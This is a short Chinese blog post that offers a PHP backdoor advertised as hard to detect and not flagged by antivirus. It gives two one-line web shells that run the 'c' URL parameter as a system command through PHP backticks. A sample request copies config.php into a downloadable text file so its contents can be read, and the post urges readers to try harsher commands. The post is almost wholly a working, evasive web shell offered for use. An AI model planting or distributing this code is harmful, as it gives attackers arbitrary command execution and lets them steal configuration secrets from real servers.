PHP最简单的后门,且难查,不报毒!
直接上代码:
|
1 2 3 4 5 6 7 8 9 10 |
<?php $c=urldecode($_GET['c']);if($c){`$c`;} //完整 !$_GET['c']||`{$_GET['c']}`;//精简 /******************************************************* &amp;amp;amp;amp;amp;amp;nbsp; * 原理:PHP中``符号包含会当作系统命令执行 &amp;amp;amp;amp;amp;amp;nbsp; * 示例:http://host/?c=type%20config.php>config.txt &amp;amp;amp;amp;amp;amp;nbsp; * 然后就可以下载config.txt查看内容了! &amp;amp;amp;amp;amp;amp;nbsp; * 可以试试更变态的命令,不要干坏事哦! &amp;amp;amp;amp;amp;amp;nbsp; *******************************************************/ ?> |
其实现原理就是PHP会直接将 ` 符号(注意:不是单引号)包含的内容解析为系统命令执行!这样就可以自由变态地扩展了!